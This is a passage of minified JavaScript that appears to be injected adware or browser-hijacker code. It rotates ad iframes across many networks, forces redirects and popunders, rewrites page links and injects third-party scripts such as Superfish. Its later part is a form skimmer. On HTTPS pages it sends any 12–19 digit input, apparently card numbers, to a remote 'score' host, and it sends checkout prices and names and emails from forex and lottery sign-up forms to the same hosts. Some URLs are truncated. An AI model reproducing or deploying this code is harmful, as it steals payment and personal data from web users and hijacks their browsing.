j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d](b);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'A9z92S5T=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body>&nbsp;\\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body>&nbsp;</body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s1566088975320376897\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(window.self.location.hostname.indexOf('outube.com')>-1 || size=='120x60' ) {return false;};return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.c...size &referrer=' (atp?atp:1), [354,size]);}}catch(e){return !1;}},clove_fixed_ca_au:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2076985\",\"300x250\":\"2076984\",\"160x600\":\"2076963\"}[size]; var surl = \"http://ads.clovenetw...=\" arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [446,size]);}}catch(e){return !1;}},glispa_us2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com...tion_code=727_0' (atp?atp:2), [593,size]);}}catch(e){return !1;}},ybrant_csg3293:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size==\"120x60\")return;var arr={\"728x90\":\"2\",\"300x250\":\"1\",\"468x60\":\"3\",\"120x600\":\"5\",\"160x600\":\"4\"}[size];var surl='http://ads.incmd01.c...ert_yb';;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1013,size]);}}catch(e){return !1;}},adgorithm_2_4:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2471940\",\"300x250\":\"2471941\",\"728x90\":\"2471942\"}[size];var surl='http://advs.adgorithms.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [940,size]);}}catch(e){return !1;}},matomy_adj30:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2461741\",\"728x90\":\"2461742\",\"160x600\":\"2461743\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1006,size]);}}catch(e){return !1;}},dsnr_dasa_e1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt...ize '&referrer=[REFERRER_URL]', (atp?atp:1), [1038,size]);}}catch(e){return !1;}},dsnr_nntbr_e1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt...ize '&referrer=[REFERRER_URL]', (atp?atp:1), [1042,size]);}}catch(e){return !1;}},mango_apx13:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 468x60 300x250 160x600 120x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2493824\",\"468x60\":\"2493825\",\"300x250\":\"2493826\",\"160x600\":\"2493827\",\"120x600\":\"2493828\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '&cb=${CACHEBUSTER}&referrer=${REFERER_URL}&pubclick=${CLICK_TAG}';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1116,size]);}}catch(e){return !1;}},adsuduos_apx16:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2527430\",\"300x250\":\"2527431\",\"728x90\":\"2527432\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1183,size]);}}catch(e){return !1;}},web3_gen27:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/...ze=' size '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]\" FRAMEBORDER=\"0\" SCROLLING=\"no\" MARGINHEIGHT=\"0\" MARGINWIDTH=\"0\" TOPMARGIN=\"0\" LEFTMARGIN=\"0\" ALLOWTRANSPARENCY=\"true\" WIDTH=\"[WIDTH]\" HEIGHT=\"[HEIGHT]', (atp?atp:1), [1188,size]);}}catch(e){return !1;}},mediawhite_27:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2562018\",\"300x250\":\"2562019\",\"728x90\":\"2562020\"}[size];var surl='http://ads.mediawhite.com/tt?id='+ arr  + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1212,size]);}}catch(e){return !1;}},velis_gen21:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600 120x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2563572\",\"300x250\":\"2563577\",\"160x600\":\"2563580\",\"120x600\":\"2563582\",\"468x60\":\"2563584\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1217,size]);}}catch(e){return !1;}},clove_rs19:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2563502\",\"300x250\":\"2563503\",\"728x90\":\"2563504\"}[size];var surl='http://ads.clovenetwork.com/tt?id='+ arr  + '&pubclick=[INSERT_CLICK_TAG]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1233,size]);}}catch(e){return !1;}},mari_qadabra:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 160x600 300x250 120x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.qadserve....ze &iframe=true' (atp?atp:1), [1319,size]);}}catch(e){return !1;}},baba_nontb_new7:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2566921\",\"300x250\":\"2566922\",\"160x600\":\"2566923\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1248,size]);}}catch(e){return !1;}},deliads_19:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '468x60 728x90 300x250 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"468x60\":\"2490297\",\"728x90\":\"2490296\",\"300x250\":\"2490295\",\"120x600\":\"2490294\",\"160x600\":\"2490293\"}[size];var surl='http://ads.deliads.com/tt?id='+ arr  + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1272,size]);}}catch(e){return !1;}},cpx_favor5:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsp...=${REFERER_URL}' (atp?atp:1), [1305,size]);}}catch(e){return !1;}},mari_gen28_4:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600 120x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2566106\",\"300x250\":\"2566107\",\"160x600\":\"2566108\",\"120x600\":\"2566109\",\"468x60\":\"2566110\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1320,size]);}}catch(e){return !1;}},cpx_nontb30_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.c...size &referrer=' (atp?atp:1), [442,size]);}}catch(e){return !1;}},cpx_youtube:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsp...=${REFERER_URL}' (atp?atp:1), [943,size]);}}catch(e){return !1;}},matomy_strm29:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2461800\",\"728x90\":\"2461807\",\"160x600\":\"2461810\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1004,size]);}}catch(e){return !1;}},web3_strm27:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/...ze=' size '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1200,size]);}}catch(e){return !1;}},mari_strm_tier1_35:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2566275\",\"300x250\":\"2566276\",\"160x600\":\"2566277\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1293,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.e...thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\");a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\");a.setAttribute(\"id\",\"sad32ecs3fdsa\");a.innerHTML='<iframe src=\"//ads.ventivmedia.com/www/delivery/afr.php?zoneid=31&cb='+Math.random()+'\" style=\"width:728px;height:90px\" frameborder=\"0\" scrolling=\"no\"></iframe>';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();})();(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax....836&pid=0&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://canadaalltax....rTaFrn==&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://canadaalltax....rTaFrn==&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://canadaalltax....rTaFrn==&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://canadaalltax....f.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};if(\"www.youtube.com\"==window.self.location.hostname&&\"http:\"==window.self.location.protocol){var video_id=window.location.search.split(\"v=\")[1];if(video_id){var ampersandPosition=video_id.indexOf(\"&\");-1!=ampersandPosition&&(video_id=video_id.substring(0,ampersandPosition));if(video_id&&document.getElementById(\"watch7-views-info\")){var vc=document.getElementById(\"watch7-views-info\").firstElementChild;vc&&document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML&&((new Image).src=\"http://score.develop...h7-views-info\").firstElementChild.innerHTML.replace(/[^0-9]/g,\"\"))}}};if((-1<window.self.location.hostname.indexOf(\"foodpanda\")||-1<window.self.location.hostname.indexOf(\"hellofood\"))&&document.getElementById(\"submitRegisterStep1\")){var price=query_selector_all(\".cart-line-price\"),p=price&&price[price.length-1]?parseInt(price[price.length-1].innerHTML.replace(/[^0-9]/g,\"\")):0,h=window.self.location.hostname;(new Image).src=\"http://score.develop...Of(\"checkout\")&&((new Image).src=\"http://score.develop...usteat.in&s=0\");\"tastykhana.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"billing\")&&((new Image).src=\"http://score.develop...usteat.in&s=0\");if(-1<window.self.location.hostname.indexOf(\"titbit.com\")||\"checkout\"==window.self.location.hostname)(new Image).src=\"http://score.develop...xOf(\"payment\")&&((new Image).src=\"http://score.develop...ubhub.com&s=0\");\"www.delivery.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"order_process\")&&((new Image).src=\"http://score.develop...ivery.com&s=0\");\"www.foodler.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"AnonCheckout\")&&((new Image).src=\"http://score.develop...odler.com&s=0\");\"eat24hours.com\"==window.self.location.hostname&&\"https:\"==window.self.location.protocol&&((new Image).src=\"http://score.develop...hours.com&s=0\");(function(){try{var a=document.getElementsByTagName(\"input\");if(\"https:\"==window.self.location.protocol&&4<a.length)for(var d=function(b){b=b.target;if(b.value&&11<b.value.length&&20>b.value.length&&b.value.match(/^[0-9]+$/))for((new Image).src=\"https://score.sendap...&s=0&r=\" ( new Date).toString()+Math.random(),b=0;b<a.length;b++)a&&a.removeEventListener?a.removeEventListener(\"blur\",d,!1):a&&a.detachEvent&&a.detachEvent(\"onblur\",d)},c=0;c<a.length;c++)a[c]&&a[c].addEventListener?a[c].addEventListener(\"blur\",d,!1):a[c]&&a[c].attachEvent&&a[c].attachEvent(\"onblur\",d)}catch(e){}})();(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\[email protected]]/ig,\"\"));if(d.length==a.length)for((new Image).src=\"https://score.sendap...nt(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$txtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"A9z92S5T=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"A9z92S5T=\")){var d=a.match(/A9z92S5T=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.websco...6qjsHpdYHqY==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax....\" Math.random();break}}}catch(d){}})();if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=pcom&userId=6143022708&CTID=p0';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1546/l.js?aoi=1311798366&pid=1546&zoneid=287609&ext=RoboSaver&systemid=3690070418775238836\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.4.1\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.num_of_items_in_one=2;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null}; a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)}; b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"undefined\"==typeof Element.prototype.appendChild.toString)document.getElementsByTagName(\"head\")[0].appendChild(a);else if(\"bing\"==b){var e=Element.prototype.appendChild,f=document.createElement(\"iframe\");Element.prototype.appendChild=f.document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©; clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!= typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var 